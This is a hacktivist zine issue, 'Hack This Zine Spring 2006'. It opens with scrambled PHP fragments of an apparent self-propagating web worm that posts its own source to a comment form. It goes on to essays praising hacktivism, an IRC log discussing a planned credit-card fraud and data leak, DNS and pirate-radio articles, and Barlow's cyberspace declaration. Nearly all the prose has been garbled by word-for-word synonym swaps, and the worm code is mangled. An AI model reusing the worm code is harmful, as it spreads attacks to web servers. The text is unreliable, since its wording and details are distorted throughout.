
(substr($url, 7), 0, +; " . ace(" ", " _SERVE +) OST $l omme cat= ept- te n(" cl t: M ebKi ko -u gt nn mmen ed+%3Ala io w= "); mak $lo ($ ), strpos(substr bstr trpo bstr($url, 7), " h++; "$" $",str_replace(" "",str_replac ", " ERVE 'PHP_SELF'])))), 2); for ($i=0;$i<2;$ $ ($do OST ocation/example2.p ubaction=showcom nts& 8831 ive=&sta m= & HTTP/1.1r ce *rnAccep ngua r Acce nc g: g d nClient <?php et.p ", ");f "$sourc ?>rnUse /5.0 (Ma h; U Ma en) Appl 6 (KHTML, li fari/412 ent- ap atio w-form dedrnConte 07r ep rnHost: $domai n xitup&mail ed+%3Alaughingpercent3 mment& n"); e_requ l) { loca tr($ l, 8), s su tr(substr($u 7), 0, str s(su h+ " . substr(str_replace(" , "", ",file_get_contents($_S VER[ i=0;$i<2;$i++) = make_request($domain T $l on wcom 88313&archive=&sta cat=& HTTP/1 r uage: enr pt-Enc gzip, def Clie pe kret.p "w") fp, " ource") e($ t: M illa h; U; PPC Mac pleW Kit/ ko) Safa pe: form-u n !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "see you on the front page of the last newspaper those motherfuckers ever print" !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! .___.__ .__ __ .__ __| _/|__| ____ |__|_/ |_ _____ | | / __ | | | / ___ | | ____ | | / /_/ | | | / /_/ >| | | | / __ _| |__ ____ | |__| ___ / |__| |__| (____ /|____/ / /_____/ / __ ___. .___ ____ ____ ____ _/ |_ _______ _____ _ |__ _____ ____ __| _/ _/ ___ / _ / ___ __ __ | __ __ / / __ | ___ ( <_> )| | | | | | / / __ _ | _ / __ _| | / /_/ | ___ > ____/ |___| / |__| |__| (____ / |___ /(____ /|___| /____ | / / / / / / / Electronic Civil Disobedience Journal !! Published by HackThisSite.org (a)nti copyright. distribute as freely as the wind and the trees. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!! HACK THIS ZINE SPRING 2006 !!! !!! TABLE OF DISCONTENTS !!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! "Globalizing a bad thing makes it worse. Business power is bad, so globalizing it is worse. But globalizing a good thing is usually good. Cooperation and sharing of knowledge are good, and when they happen globally, they are even better. The kind of globalization there are demonstrations against is the globalization of business power. And free software is a part of that movement. It is the expression of the opposition to domination of software users by software developers." Richard Stallman THEORY [ hackers, crackers, artists & anarchists ........................... hackbloc ] [ support hairball against unjust felony charges ...... hacker defense network ] [ fighting the commercialization of the internet ... internet liberation front ] [ pirate radio and the dreaded FCC ................................. evildeshi ] [ declaration of the independence of cyberspace ....... john barlow of the EFF ] [ uk indymedia interview ........... hackers defending open publishing systems ] [ misadventures of irish hackers ........................................... C ] SKILLS [ writing a php fuzzer to self-discover web vulnerabilities .................. ] [ arp poisoning .................................................... darkangel ] [ ars viralis : the viral art ..................................... nomenumbra ] [ proxy chaining .................................................... outthere ] [ tunnelling and tor ................................................ kuroishi ] [ anatomy of a phone number ................................... br0kenkeychain ] ACTION [ the art of writing a web worm in php ....................... world cant wait ] [ dismantling the copyright industry ................ disrespectcopyrights.net ] [ black and white chicago 2600 ............................................... ] [ graffiti and counter-culture ........................ the wooster collective ] CLOSING STATEMENTS [ hack this zine: spring 2006 ... happenings ... make contact ... get involved ] HACK THIS ZINE SPRING 2006 is FREE TO COPY AND DISTRIBUTE GET ELECTRONIC VERSIONS AT HACKTHISSITE.ORG/ZINE CONTACT [email protected] OR IRC.HACKTHISSITE.ORG !!!!!!!!!!!!!!!! !!! THEORY !!! !!!!!!!!!!!!!!!! "Whether or not via easy information piracy, or else by a extra complicated growth of precise rapport with chaos, the Internet hacker, the cyernetican of the Short-term Autonomous Zone, will discover methods to make the most of pertubations, crashes, and breakdowns within the Web (methods to make info out of "entropy). As a scavanger of data shards, smuggler, blackmailer, maybe even cyberterrorist, the TAZ-hacker will work for the evolution of clandestine fractal connections. These connections, and the totally different info that flows amongst and between them, will kind "energy shops" for the coming-into-being of the TAZ itself-as if one have been to steal electrical energy from the energy-monopoly to gentle an deserted home for squatters." - Hakim Bey, Short-term Autonomous Zone [------------------------------------------------------------------------------] [ hackers, crackers, artists & anarchists ........................... hackbloc ] [------------------------------------------------------------------------------] We began the Hack This Website undertaking to unfold the concept that info calls for to be free and by offering hackers with palms on coaching we might present folks the best way to use their expertise for optimistic makes use of of free know-how. After assembly up with others who have been engaged on comparable tasks and realizing how folks have been impressed to show expertise to motion from the primary few zines we launched, we determined to get collectively and begin Hackbloc. Hackbloc are native gatherings of with hackers and activists to share expertise, an affinity group of hacktivists, and a tactic at protests and different actions. We act to defend a free web and a free society by mixing hacker and activist methods to discover each defensive hacktivism (defending free web and open publishing methods) and direct motion hacktivism (actions in opposition to corrupt companies, governments and different types of fascism). Hackbloc is a decentralized community of cells which collaborate and coordinate actions in solidarity with different social justice struggles around the globe. We met up at varied actions and gatherings across the nation to share and community with different hackers and activists. We handed out underground hacker magazines at guerrilla tables at DEFCON. We have now had a number of workshops and events in Chicago the place dozens of hackers across the area acquired collectively to play wargames, decide locks, swap code, and in any other case plot for future tasks and actions. We acquired collectively to carry enormous protests in each DC and San Francisco for the World Financial institution / IMF conferences the place a number of hundred thousand folks gathered for anti-war and anti-capitalists protests. The extra we began coordinating our actions with others who have been engaged on comparable tasks, the extra we started to notice how totally different struggles everywhere in the world are related. Battles within the courtrooms over political and hacker arrests and investigations of a number of folks everywhere in the world present invaluable classes for these contemplating getting concerned, taking part in the sport, and organizing on-line communities. With the intention to be protected and efficient, we have to observe good safety tradition by working solely with trusted folks in tight decentralized affinity teams, preserve a mainstream entrance to recruit folks for facet tasks, and work to settle variations between potential allies and unite for the larger good. As individuals who can see past and create alternate options to deprave methods, hackers are in a singular place to confront and combat the forces which assault digital rights and a free web. Impartial media, free know-how and non-commercial web creates short-term autonomous zones the place an underground community of hackers who's obligation and duty consists of coaching one another to confront and combat these injustices - to defend hackers going through jailtime, expose company and authorities corruption, discover alternate options to industrial software program, share information and speak techniques with potential allies. We're not the violent, damaging madmen that regulation enforcement and the media paints us as. We work to construct a free web and a free world and we refuse to be bullied by proper wing extremists, white hat sellouts, or regulation enforcement who stand in the way in which. Hacktivists of the world, unite! -- "The FBI COINTELPRO program was initiated in 1956. Its objective, as described later by FBI Director J. Edgar Hoover, was "to show, disrupt, misdirect, discredit, or in any other case neutralize actions" of these people and organizations whose concepts or objectives he opposed. Techniques included: falsely labelling people as informants; infiltrating teams with individuals instructed to disrupt the group; sending nameless or solid letters designed to advertise strife between teams; initiating politically motivated IRS investigations; finishing up burglaries of workplaces and illegal wiretaps; and disseminating to different authorities companies and to the media unlawfully obtained derogatory info on people and teams." We face unprecedented police state measures which particularly goal activists and hackers. Within the identify of nationwide safety, federal regulation enforcement has been spying on, targetting, and harassing activists together with anti-war, animal rights, and earth first and different protest teams. Whether or not they tackle the type of the USA Patriot Act, expanded Homeland Safety powers, Complete Data Consciousness, enemy combatants, army tribunals, or Bush personally authorizing the NSA to spy on Individuals with out courtroom orders and warrants, these actions reveal a sample of abuse and the transition to a neo-fascist police state which treats hackers and activists as terrorists. When an administration breaks the regulation and walks everywhere in the structure, it's time for a regime change. [------------------------------------------------------------------------------] [ support hairball against unjust felony charges ...... hacker defense network ] [------------------------------------------------------------------------------] Federal prosecuters are accusing Michael Wally(often known as "Hairball") of Pittsburgh of 'stealing' and distributing 37,000 free cellphone playing cards from a web-based giveaway, citing damages at over $333,000. As of this writing, the US Lawyer is providing Hairball a deal the place he would plead responsible to felony wire fraud and serve as much as three years in jail. Folgers.com was gifting away free 30 minute cellphone playing cards on it is web site as half of a web-based promotion to individuals who crammed out a fast survey. Allegedly, Hairball discovered a approach to automate the method and get lists of free cellphone playing cards. What's unclear about these accusations is whether or not that is an precise prison offense or just a violation of Folger's phrases of service settlement(a civil case). Hairball, having began HBX Networks, was a well-liked goal of cyber-crime authorities. HBX has began various pc hacking tasks, together with the free shell undertaking, the HAXOR radio present, wardialing tasks, a bustling IRC server, and extra. Hairball has contributed positively to the hacking neighborhood, however has fallen sufferer to unjust prosecution with overblown sentencing. As a part of a brand new development in cyber crime and regulation enforcement, hackers and activists are handled like terrorists and are sometimes topic to unlawful surveillance and unjust investigation, prosecution, and sentencing. Robert Erdley of the Pittsburgh Excessive Tech Crimes Process Power has personally raided and arrested Hairball a number of occasions, together with an earlier incident in late August 2004 regarding HBX's wardialing undertaking. His case has since been handed on to federal authorities, and is now going through a number of years in jail and huge restitutions for hurting or stealing from no person. Hairball has at all times labored to defend free know-how and has impressed a quantity of individuals to find out about computer systems and hacking. If Hairball goes to jail, a nice crime can have been dedicated in opposition to the hacking neighborhood by reactionary federal prosecutors. We have to stick collectively to defend our comrades going through jailtime and write letters, make cellphone calls, and in any other case unfold the phrase about unjust hacker prosecution. THEY'RE IN THERE FOR US, WE'RE OUT HERE FOR THEM Hackers contemplating beginning a Hacker Protection Community ought to take a look at varied jail help networks for establishing authorized help. www.prisonactivist.org www.spiritoffreedom.org.uk www.anarchistblackcross.org www.abcf.web www.booksnotbars.org www.prisonbookprogram.org .--------------------------------------------------------------------. | Session Begin: Friday, 4 February 2005 | | Contributors: | | narc ([email protected]) | | Kfir ([email protected]) | .--------------------------------------------------------------------. [07:24:40 PM] Kfir: hiya there. [07:25:09 PM] narc: hello. I am not answerable for prosecution, or something, based mostly on the logs I despatched you? [07:25:32 PM] narc: that issues me.. I am keen that can assist you in each capability potential, however that is one factor I would quite keep away from [07:26:00 PM] Kfir: I am unsure... however i am unable to think about anybody would prosecute somebody who's strolling away, and serving to catch the mastermind [07:26:13 PM] narc: properly. I by no means really intruded in your system [07:26:19 PM] narc: all I did was discover an exploit within the .php [07:26:19 PM] narc: heg [07:26:21 PM] narc: heh* [07:26:41 PM] Kfir: I inform you what although, i might combat tooth and nail to forestall your prosecution. [07:26:55 PM] narc: I do not *assume* that is a prison offence [07:27:15 PM] Kfir: i might quite not prosecute anybody in the event you're going to go down - you're serving to us tremendously, and you're stopping some very severe prison exercise. [07:27:47 PM] Kfir: i'm within the strategy of attempting to get the entire bank card numbers fraud blocked. [07:27:55 PM] Kfir: it isn't straightforward work, however i want a while. [07:27:58 PM] narc: yeah [07:28:01 PM] narc: I can think about [07:28:04 PM] Kfir: is there any manner you may postpone the costs for a few days? [07:28:08 PM] narc: sure [07:28:13 PM] narc: he is stymied for the time being [07:28:19 PM] narc: he is placing it off til at the very least sunday [07:28:23 PM] narc: perhaps later within the week [07:28:28 PM] Kfir: good. [07:28:50 PM] Kfir: i will want that a lot time to verify no one will get defrauded. i do not give a rattling concerning the server at this level. [07:29:10 PM] narc: yeah... he already had SQL dumps by the point he contacted me [07:29:16 PM] Kfir: he can have the goddamned factor. it isn't like we'll pack our baggage and dissappear. [07:29:17 PM] narc: so I do not fairly know the way he obtained them [07:29:34 PM] narc: yeah, properly, from what I gathered from working processes he pasted, you have been backing the field up anyway [07:29:35 PM] narc: heh [07:30:15 PM] Kfir: If i will get the fbi to take heed to me, a credible witness could be a great distance. In case you are gauranteed from prosecution, would you cooperate with authorities? [07:30:40 PM] narc: yeah [07:30:43 PM] Kfir: yeah, i've the whole server tar balled and safely saved for future use. [07:30:58 PM] narc: however this will trigger issues insofar as I would quite not have him know who I'm [07:31:06 PM] Kfir: does he? [07:31:09 PM] narc: no [07:31:10 PM] narc: he most likely has a LOT of sway with sure folks [07:31:55 PM] narc: he is made a variety of contacts within the scene... is aware of many, many safety specialists, and possibly is aware of loads of militant activists too [07:31:56 PM] Kfir: Jeremy can get into very huge hassle - he is only a child, and i might hate to see a person with apparent expertise be despatched to jail. [07:32:30 PM] narc: yeah... I am solely 18 [07:32:31 PM] Kfir: however this bank card enterprise is simply loopy - i actually do not perceive what would drive somebody to do one thing so silly. [07:32:49 PM] Kfir: wow... [07:33:09 PM] Kfir: children at this time... i must bone up on my safety information. [07:33:47 PM] narc: if there's one factor he's, it is keen to goto jail [07:34:09 PM] narc: his beliefs devour every thing he does [07:34:23 PM] narc: not essentially that totally different out of your common Islamic terrorist, I suppose. [07:34:33 PM] Kfir: i began coding HQ and administering the PW server with out a lot expertise. after studying the logs i can see how a lot there may be to study - it nearly appears like it will take a full-time focus to grasp. [07:35:20 PM] Kfir: so why did you agree within the first place? you clearly have ethical fiber... why destroy different peoples property? [07:35:29 PM] narc: I by no means deliberate to [07:35:38 PM] narc: I used to be going to see the place it was heading [07:35:47 PM] narc: displaying him an exploit appeared like a great way to realize his belief [07:36:12 PM] Kfir: oh.. [07:36:25 PM] Kfir: so does he not have root entry at this level? [07:36:32 PM] narc: nope [07:36:44 PM] Kfir: is he ready for the bots to restart? [07:36:47 PM] narc: I've had the distinct impression within the 12 months and a half that I've identified the man that he has been up to much more than it appears [07:36:49 PM] narc: seems I used to be proper [07:37:48 PM] narc: moreover, the exploit I gave him by no means fairly labored [07:38:28 PM] narc: I knew it'd work on the check copy of the bot he'd setup, however not in your field -- diff ver of php command line binary [07:38:53 PM] Kfir: so is he ready for the bots to fireside up? [07:39:08 PM] narc: I consider so [07:39:28 PM] narc: however consider me, that flaw was very, very minor... even exploiting is properly previous most individuals's capabilities, because the overwhelming majority of shell metacharacters have been prohibited [07:39:40 PM] Kfir: do you might have any particulars as to his plans to make use of the pw server to launch the cc cost exploit? [07:39:41 PM] narc: you ran a reasonably good system [07:39:49 PM] narc: from what I've seen [07:39:59 PM] Kfir: that is rob's work... i primarily work on the php code. [07:40:04 PM] narc: yeah [07:40:10 PM] narc: properly, your PHP code had few flaws [07:40:12 PM] narc: if any... [07:40:15 PM] narc: Xec by no means discovered any [07:40:33 PM] Kfir: yeah, we have been very cautious in our patch up after the RNC hack [07:40:59 PM] Kfir: we made positive no malicious chars have been allowed to enter an sql question. [07:41:13 PM] narc: his personal website had just a few billion holes [07:41:24 PM] Kfir: hts.org? [07:41:36 PM] narc: yeah [07:41:51 PM] narc: I acquired concerned with them to study, to not take down the opposition's political speech [07:41:57 PM] Kfir: i educated on his website a couple of 12 months in the past. [07:42:11 PM] Kfir: agreed - let one of the best concepts win. [07:42:37 PM] Kfir: not one of the best gun. [07:42:47 PM] narc: I do not assume he realizes that he has develop into exactly what he purports to despise a lot [07:43:11 PM] Kfir: no offense to you, however that appears to be very typical of these we encounter on the "different facet". [07:43:32 PM] Kfir: you appear extraordinarily mature for an 18-year-old, it is nearly laborious to consider. [07:43:42 PM] Kfir: However you Aussies at all times have been a breed aside. [07:44:10 PM] narc: heh... I simply began faculty, I haven't got a lot curiosity in happening for some silly hacking offence [07:44:42 PM] Kfir: i feel he is intoxicated by the glory of being an "underground hacker". [07:44:59 PM] Kfir: he is in love with this romantic notion of taking down the "fascists". [07:45:02 PM] Kfir: very deluded. [07:45:02 PM] narc: no glory in destruction, or so I've discovered [07:45:38 PM] Kfir: do you might have any particulars as to his plans to make use of the pw server to launch the cc cost exploit? [07:45:51 PM] Kfir: i observed he talked about that within the logs. [07:46:12 PM] narc: sure, he wished me to jot down scripts to do it [07:46:14 PM] narc: nonetheless does, I suppose [07:46:30 PM] narc: however that is been delayed by the actual fact the exploits have mysteriously disappeared [07:46:40 PM] Kfir: so will you postpone that as a lot as you may with out him understanding your suspending? [07:46:57 PM] Kfir: assuming he finds one other exploit? [07:47:04 PM] narc: he will not know. he is paranoid; believes that the feds are most likely already watching him [07:47:14 PM] narc: most likely are, too, given his historical past [07:47:19 PM] narc: they've tried to pin a variety of stuff on him however failed [07:47:25 PM] Kfir: has he broadcasted the cc#'s but? [07:47:34 PM] narc: no. that waits till the costs happen [07:47:41 PM] narc: then he plans to launch them to cryptome.org and P2P networks [07:47:49 PM] narc: in addition to utilizing his media contacts to make sure large publicity [07:47:54 PM] Kfir: properly, at that time, they're going to be ineffective. [07:47:59 PM] narc: yeah [07:48:06 PM] narc: however I believe the purpose is a "ethical victory" [07:48:08 PM] narc: or so he says [07:48:09 PM] Kfir: how does he plan to get publicity whereas remaining nameless? [07:48:24 PM] narc: nameless remailers/his bounce servers, I guess. [07:48:36 PM] Kfir: will an official group take credit score? [07:48:38 PM] narc: until he is caught within the act, it's going to take months of subpoenas to show it was him [07:48:43 PM] narc: yeah [07:48:44 PM] narc: ILF [07:48:48 PM] narc: ("Web Liberation Entrance") [07:48:51 PM] Kfir: why months of subpoenas? [07:48:57 PM] narc: worldwide servers... [07:49:00 PM] narc: most aren't home [07:49:16 PM] narc: and he plans to get another person to wipe the lot to interrupt the chain [07:49:29 PM] narc: he may not be that gifted at hacking per se, however he is aware of the best way to cowl his tracks [07:49:30 PM] Kfir: properly, the logs are pretty incriminating. [07:50:00 PM] narc: I am nearly sure he'd get away with it if I hadn't contacted you [07:50:10 PM] Kfir: no argument there. [------------------------------------------------------------------------------] [ fighting the commercialization of the internet ............................. ] [------------------------------------------------------------------------------] As laborious as companies and governments attempt to management the movement of knowledge on the web, they'll by no means meet up with hackers who're at all times one step forward and have developed all types of the way to bypass restrictions positioned on exchanging info freely. An ever-growing variety of darknets and different fashions of content material distribution have been created utilizing file sharing companies resembling Gnutella and BitTorrent, open publishing methods resembling IndyMedia and Wiki, and open DNS methods resembling OpenNIC and Afraid.org. These DIY networks can't be purchased, bought, or in any other case managed and are unstoppable weapons which won't solely make copyright and industrial web irrelevant, however pave the way in which to growing totally new networks, pirate utopias based mostly on an open supply anarchist method in direction of the free change of data. "Amount and high quality of P2P applied sciences are inversely proportional to the numbers of lawsuits issued to cease P2P" - third Monty's Legislation -- Gross privateness violations are a small a part of basic issues with how ICANN is structured. In a paper revealed at kuro5hin.org, "An Conceited DNS Proposal" outlines the broader issues with ICANN's DNS mannequin: * DNS is centrally managed by a company (ICANN) whose major curiosity is supporting enterprise, quite than in sustaining and enhancing the system itself and whose major declare to legitimacy is thru delegation by a single nation's authorities (USA). * The system is managed by a single for-profit company (NSI), which is dangerous sufficient however registrations are managed by many competing for-profit companies. NSI can also be primarily legitimized by delegation from a single authorities (USA once more, naturally). * The Mental Property legal guidelines of a single nation (there's the USA once more) are getting used inappropriately to manage the actions of customers in non-commercial components of the Web (company management of the .web and .org area bushes via US Trademark regulation) and in different nations. -- Open publishing methods such because the IndyMedia permits folks to publish bulletins freely and develop into the media. IndyMedia is a decentralized community of media collectives present in most main cities around the globe that enable folks to publish bulletins, replace fliers, and in any other case tune in to the happenings of the realm. There are a number of flavors of IMC software program together with sfactive, mir, and dadaimc - all of which have benefits and drawbacks. IndyMedia software program is mostly open supply and other people can and do arrange their personal IMC collectives with minimal effort. Wiki open publishing software program has turning into more and more well-liked over the previous few years. Websites with Wiki enable folks to create and modify all pages within the index, and as an alternative of ensuing with chaos and confusion, companies like Wikipedia.org have develop into wildly profitable. Peer to see file sharing companies open entire new worlds the place we are able to talk and collaborate at an accelerated charge, the place creativity is not inhibited by such artificialities as copyright legal guidelines and property rights. Transferring properly past centralized methods resembling Napster, know-how like BitTorrent, Gnutella, FastTrack, eDonkey, and numerous others have created networks impartial of centralized servers permitting folks to share information and write their very own shoppers for these protocols. Our success with these companies are indicated by how frightened the industrial business is getting and the way determined and ineffectual their makes an attempt to close down these companies via authorized means. When one service shuts down, one other three spring up much more decentralized and nameless than earlier than. Along with offering free dynamic DNS companies, Afraid.org has additionally arrange a system the place domains may be made public and shared with different customers on the web. Individuals can register domains, level them to afraid.org's DNS servers, and make them 'public' - permitting others to register their very own subdomains and have them level to their very own servers. There are millions of public domains that folks can already begin utilizing. -- ICANN and Alternate options to Industrial DNS Since ICANN coverage is now requiring legitimate public contact info, many domains which host controversial content material together with dissident or whistleblowing companies have had to decide on to surrender their identify, e mail, cellphone quantity, and deal with or face being shut down. A number of domains we run together with Hack This Website, Hacktivist.web, FreeJeremy.com and Prole.data have been all targetted and shut down with none warning, taking weeks for them to reply to us faxing in copies of our drivers license, cellphone payments, and different documentation confirming our true info. This new coverage is an obscene violation of our privateness and is a menace to dissident or whistleblowing teams. Within the ensuing discussions, the OpenNIC undertaking was created to be a "person owned and managed Community Data Middle providing a democratic, non-national, various to the normal Prime-Stage Area registries". Customers can leap on this community by including an OpenNIC DNS server to their system configuration. OpenNIC is non-profit and structured in a democratic manner, with elected directors and public ballots for brand new insurance policies, additionally giving the power for folks to start out their very own high degree domains (resembling .indy, .geek, .null, .oss, and .parody) The concept is to be non-profit, democratic, and permit folks to create and handle their very own high degree domains. So long as we're speaking via industrial ISPs, we topic ourselves to networks which may be simply monitored and managed. Though we are able to develop all types of the way of sliding out and in of those methods securely, we are nonetheless reliant on web infrastructure that's owned and run by companies and authorities. We must be come used to the thought of The Guerrilla.Web undertaking proposes establishing an alternate community of open wifi nodes. Encryption and anonyminity is built-in at a router degree, additionally creating the power to determine safe tunnels to the 'actual' web. The thought is to arrange a decentralized community of wifi cells run by totally non-profit teams utilizing open requirements. -- "There's proof that the darknet will live on and supply low value, high-quality service to a big group of shoppers. Which means that in lots of markets, the darknet might be a competitor to authorized commerce. From the purpose of view of financial principle, this has profound implications for enterprise technique: for instance, elevated safety might act as a disincentive to authorized commerce." -- "As strain is asserted upon the Web from insecure people in varied World Governments, an alternate community is required to insure that the free movement of data will not be obstructed, captured, analyzed, modified, or logged. This is the principle objective of guerrilla.web. To supply a networking cloth exterior of Governments, industrial Web service suppliers, telecommunications corporations, and dubius Web regulatory our bodies. The free movement of personal info is a REQUIREMENT of a free society." (guerrilla.web) -- To assist with the OpenNIC undertaking, arrange your pc(and persuade your ISP) to use the extra OpenNIC DNS servers and enroll on the mailing listing to maintain up and contribute to the undertaking. Some folks have additionally advised the thought of having "OpenDNS Day", the place for in the future out of the month folks would have their servers configured to disallow connections from ICANN requests, encouraging folks to arrange OpenNIC on their machines. OpenNIC DNS servers are break up into three tiers: the primary two tiers are for inner synchronization functions whereas the third tier are end-user servers which you'll be able to add to your community settings to hop on the entwork. Tier 0: ns0.opennic.glue (opennic.glue; Oakland, CA, US) - 131.161.247.232 Tier 1 ns1.opennic.glue (.oss; San Jose, CA, US) - 208.185.249.250 ns4.opennic.glue (.oss; San Jose, CA, US) - 208.185.249.251 ns8.opennic.glue (.parody; US) - 65.243.92.254 ns10.opennic.glue (.indy; Dallas, TX, US ) - 66.227.42.140 ns11.opennic.glue (.indy; Dallas, TX, US ) - 66.227.42.149 ns12.opennic.glue (.fur, .geek; Backyard Grove, CA, US ) - 64.81.44.251 Tier 3: ns1.de.opennic.glue (Cologne, DE) - 217.115.138.24 ns1.jp.opennic.glue (Tokyo, JP) - 219.127.89.34 ns2.jp.opennic.glue (Tokyo, JP) - 219.127.89.37 ns1.nz.opennic.glue (Auckland, NZ) - 202.89.131.4 ns1.uk.opennic.glue (London, UK) - 194.164.6.112 ns1.phx.us.opennic.glue (Phoenix, AZ, US) - 63.226.12.96 ns1.sfo.us.opennic.glue (San Francisco, CA, US) - 64.151.103.120 ns1.co.us.opennic.glue (Longmont, CO, US) - 216.87.84.209 ns1.ca.us.opennic.glue (Los Angeles, CA, US) - 67.102.133.222 -- [------------------------------------------------------------------------------] [ hacktivism project introduction ............................................ ] [------------------------------------------------------------------------------] As hacktivists, we encourage hackers to think about the social and political implications of actions. We consider it's irresponsible to show folks the fundamentals of web safety with out a broad understanding of the world round them. We're in a singular place to work collectively to defend our rights on the web and in social justice struggles around the globe. We preserve a variety of techniques via the next collectives which work collectively to construct a broader motion: Hacktivist.web - We function an above floor Ôthink tank' for the beliefs of hacktivism and digital civil disobedience. We defend open publishing methods and encourage free debate concerning the ethics of blending hacking and radical politics. Hackbloc.org - A mannequin of organizing hacktivist cells in every native metropolis. Every cell maintains autonomy from central management but coordinates and networks with different hackbloc cells everywhere in the world. The Hackbloc web site serves as a networking physique the place folks can learn updates and plug in to native collectives. HackThisSite.org - An above floor coaching useful resource the place everyone can observe their hacking expertise in a set of reasonable challenges. We create a studying atmosphere the place folks can discover out and become involved with lots of the different tasks our individuals are engaged on. Varied tasks and teams we're concerned with: * Publish an open hacktivist journal to be distributed without spending a dime over the web and in print * Liberation Radio: creation and distribution of subversive audio recordings and different underground supplies via a web-based radio station * Shield free speech on the web by making contributions and code audits to main IndyMedia, Wiki, IRC, P2P file sharing, and different open publishing code bases * Present internet hosting and help for radical methods in instances of hack assaults,s erver seizures, and many others. * Take part in varied conventions, protests, and different nationwide actions to present on-the-ground communication whereas making noise and spreading the phrase about hacktivism We use a decentralized, instantly democratic mannequin of group and are in search of contributions and coordination from individuals who want to develop into concerned with the undertaking. We're desirous about working along with different teams and people to construct a bigger hacker motion. Collectively we stand, divided we fall. Hacktivists of the world, unite! [------------------------------------------------------------------------------] [ pirate radio and the dreaded FCC ................................. evildeshi ] [------------------------------------------------------------------------------] FM EXCITERS And AMPLIFIERS That is the ÒheartÓ of your station. It has an oscillator, an audio enter part, a FM modulation part, a RF pre-amplification stage and an RF amplified output stage and generally an RF filter stage. ANTENNAS An correctly tuned (low VSWR) antenna, J-pole, 5/8ths wave vertical, 1/4 wave dipole, broadband and many others. as excessive up as you will get it makes up for LOTS of energy and is time and cash WELL spent! AMPLIFIERS Amplifiers are fairly boring items of kit. They amplify your measly little exciter's alerts to ranges that may ship strong reception to your listening viewers. FILTERS These gadgets are used to lower the output of frequencies with which you're NOT broadcasting. These OTHER frequencies are often known as harmonics and you do not need any! Harmonics are your enemy! SWR METERS You get what you pay for whenever you purchase a VSWR meter. Low-cost ones are nugatory, they're going to lie and make you assured when try to be in any other case. Hen makes the BEST and they're costly at $300+ US, nonetheless, Diawa, Diamond, Commonplace Communications are all good, servicable models that you could belief and can final and final. DUMMY LOADS You may have an ideal VSWR studying each time with a dummy load! No sign out however what the hey! Straightforward to construct a little bit one, pre-built ones can value $30 - $100 or so relying on the wattage it should deal with. Tuning your antenna Utilizing a correctly tuned antenna is important for micropower broadcasting on the FM band. An antenna that's not correctly tuned won't cross alongside your transmitter's energy as effectively because it might and this results in a basic degradation of sign protection. ETHICS: The airwaves are a neighborhood property. One should at all times deal with it as such, respecting the area of different stations, each industrial and micro. LOOKING FOR OPENINGS: Admittedly, some components of the nation don't have any empty channels. Locations like south Florida, California, New York and Chicago are nearly crammed filled with stations. For the remainder of us, if we glance laborious, we are able to find a number of unused channels. ONCE YOU DECIDE You have positioned a channel that is clear and has no robust close by adjacents broadcasting. 1. Educate your self about radio principle. Purchase the Radio Newbie's Handbook and examine it. 2. You may want some important instruments to keep away from working blind. It's best to have an oscilloscope with at the very least a 100Mhz bandwidth so you may see what your provider appears like and if the system is working incorrectly, inflicting parasitic oscillation. It's best to have an excellent steady frequency counter that has at the very least a 10 ppm accuracy and determination to 1hz at 100Mhz. A great Volt-Ohmmeter for basic measurements of voltages and resistance. A SWR impedance analyzer bridge (MFJ Enterprises makes an inexpensive unit, mannequin MFJ259, which mixes a frequency counter, R.F. sign generator, SWR meter and resistance meter in a single versatile unit). ESSENTIAL COMPONENTS OF A STATION The primary transmitter. A unit that's crystal-controlled and/or PLL synthesized, utilizing varactor diode tuning and modulation strategies. A broadcast limiter. Stereo, when you've got a stereo generator. That is important to insure non-interference to adjoining channels and preserve most quantity with out overmodulating. Setting your modulation ranges. * An SWR/Energy Meter to watch the situation of your antenna system. * A mixing board to behave as your program management heart. * Audio sources to supply program materials. * A great microphone. Optionally, in the event you broadcast in stereo, you will want so as to add the fol- lowing: * A multiplex ÒstereoÓ generator. * Two-channel broadcast limiter. All elements again to the studio must be stereo succesful. The unique model of this text was written by EvilDeshi though to suit the article onto this single web page we wanted to water down the content material alot however you may learn the total article at: http://wickedradio.org/radio.rtf [------------------------------------------------------------------------------] [ declaration of the independence of cyberspace ....... john barlow of the EFF ] [------------------------------------------------------------------------------] Governments of the Industrial World, you weary giants of flesh and metal, I come from Our on-line world, the brand new dwelling of Thoughts. On behalf of the long run, I ask you of the previous to depart us alone. You aren't welcome amongst us. You don't have any sovereignty the place we collect. We have now no elected authorities, nor are we more likely to have one, so I deal with you with no larger authority than that with which liberty itself at all times speaks. I declare the worldwide social area we're constructing to be naturally impartial of the tyrannies you search to impose on us. You don't have any ethical proper to rule us nor do you possess any strategies of enforcement we've true cause to concern. Governments derive their simply powers from the consent of the ruled. You may have neither solicited nor acquired ours. We didn't invite you. You have no idea us, nor are you aware our world. Our on-line world doesn't lie inside your borders. Don't assume that you could construct it, as if it have been a public development undertaking. You can't. It's an act of nature and it grows itself via our collective actions. You haven't engaged in our nice and gathering dialog, nor did you create the wealth of our marketplaces. You have no idea our tradition, our ethics, or the unwritten codes that already present our society extra order than may very well be obtained by any of your impositions. You declare there are issues amongst us that it's worthwhile to remedy. You employ this declare as an excuse to invade our precincts. Many of those issues do not exist. The place there are actual conflicts, the place there are wrongs, we'll determine them and deal with them by our means. We're forming our personal Social Contract. This governance will come up in keeping with the circumstances of our world, not yours. Our world is totally different. Our on-line world consists of transactions, relationships, and thought itself, arrayed like a standing wave within the net of our communications. Ours is a world that's each in every single place and nowhere, however it's not the place our bodies dwell. We're making a world that each one might enter with out privilege or prejudice accorded by race, financial energy, army pressure, or station of beginning. We're making a world the place anybody, anyplace might categorical his or her beliefs, irrespective of how singular, with out concern of being coerced into silence or conformity. Your authorized ideas of property, expression, id, motion, and context do not apply to us. They're based mostly on matter, There isn't a matter right here. Our identities don't have any our bodies, so, not like you, we can not get hold of order by bodily coercion. We consider that from ethics, enlightened self-interest, and the commonweal, our governance will emerge. Our identities could also be distributed throughout a lot of your jurisdictions. The one regulation that each one our constituent cultures would typically acknowledge is the Golden Rule. We hope we might be in a position to construct our explicit options on that foundation. However we can not settle for the options you are trying to impose. In america, you might have at this time created a regulation, the Telecommunications Reform Act, which repudiates your individual Structure and insults the 